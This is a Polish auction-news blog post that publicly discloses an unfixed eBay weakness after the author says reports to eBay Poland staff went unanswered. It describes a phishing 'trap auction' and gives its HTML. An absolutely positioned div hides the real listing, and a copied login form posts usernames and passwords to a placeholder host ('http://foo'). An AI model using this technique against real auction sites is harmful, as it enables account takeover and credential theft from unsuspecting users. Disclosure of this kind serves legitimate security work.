Aukcje.org

Aukcje internetowe w Polsce i na świecie

• newsy
• archiwum
  • Aukcje internetowe na świecie
  • Aukcje internetowe w Polsce
  • Bezpieczeństwo
  • Co nowego?
  • Domy aukcyjne
  • E-biznes
  • Felieton
  • Humor
  • Korespondencja
  • Narzędzia
  • Nowe serwisy
  • Podatki
  • Porady
  • Przegląd prasy
  • Statystyki
  • Wyniki ankiet
  • Wywiady
• narzędzia
  • Antywirusy
  • Archiwizatory aukcji
  • Archiwizatory plików
  • Bramki SMS
  • Edytory HTML
  • Email
  • Firewall
  • FTP
  • Generatory opisów
  • Grafika
  • Hosting ilustracji
  • Kalkulatory
  • Komunikatory
  • Księgowość
  • Liczniki
  • Magazyn
  • Pakiety biurowe
  • Promocja sprzedaży
  • Przeglądarki
  • Snajpery
  • Statystyki
  • Szablony
  • Toolbar
  • Wystawianie aukcji
  • ~Inne
• linki
  • Aukcje internetowe na świecie
  • Aukcje internetowe w Polsce
  • Aukcje kredytowe na świecie
  • Aukcje kredytowe w Polsce
  • Aukcjonerzy
  • Domy aukcyjne - Polska
  • Domy aukcyjne - świat
  • Firmy kurierskie
  • E-biznes
  • Hobby
  • Hurtownie
  • O aukcjach
  • Ogłoszenia
  • Płatności internetowe
  • Producenci
  • Sklepy
  • Web 2.0
  • ~ inne

eBay - dziura jak była, tak jest

W marcu ubiegłego roku spotkałem się z pracownikami Ebay Polska: Przemkiem Plutą i Emilem Podlaszewskim, w celu przekazania informacji na temat luki bezpieczeństwa występującej zarówno w polskiej jak i międzynarodowej wersji eBay. Po miesiącu opublikowałem informację na temat zagrożenia. Dziś sprawdziłem co eBay zrobił w tej sprawie. Nie zrobiono kompletnie nic.

Poniżej przedstawiam opis aukcji-pułapki pozwalającej na przejmowanie kont nieświadomych użytkowników eBay.

Koncepcja

Pułapka polega na stworzeniu opisu aukcji imitującego stronę do logowania eBaya. Istnieje bardzo duże prawdopodobieństwo, że po wejściu na taką aukcję nieświadomy aukcjoner zaloguje się. Dane z pól formularza nie będą jednak wysyłane do skryptu eBay - zamiast tego polecą na nasz serwer.

Maska

Opis aukcji zwykle zawarty jest w określonym przez eBay polu strony. Ale od czego mamy formatowanie CSS - możemy nim zmienić wygląd dowolnych elementów, lub jeszcze łatwiej - po prostu zakryć całą stronę opisu przedmiotu aukcji:

---

<div style="position:absolute;height:10000px;width:100%;left:0;top:0;z-index:101;background-color:#FFF;”>
(..)
</div>

---

Imitacja

Tak, jak to opisałem, eBay nie kontroluje czy w opisie aukcji użyliśmy znacznika <form>. Możemy więc wkleić kod HTML strony logowania ebay. Przekierujemy jedynie podawane informacje do własnego skryptu:

---

<form action="http://foo” method="post”>

---

Zamiast http://foo wstawiamy adres skryptu odbierającego dane (loginy i hasła) z formularza. Pułapka gotowa.

 

Zobacz:

Poprzedni news: Partyzancki (?) marketing Allegro

Następny news: Allegro - wielkie polowanie

 

RSS | RSS komentarzy | Kontakt | O stronie | Polityka prywatności

Copyright © Jacek Z. Strzembkowski - wszelkie prawa zastrzeżone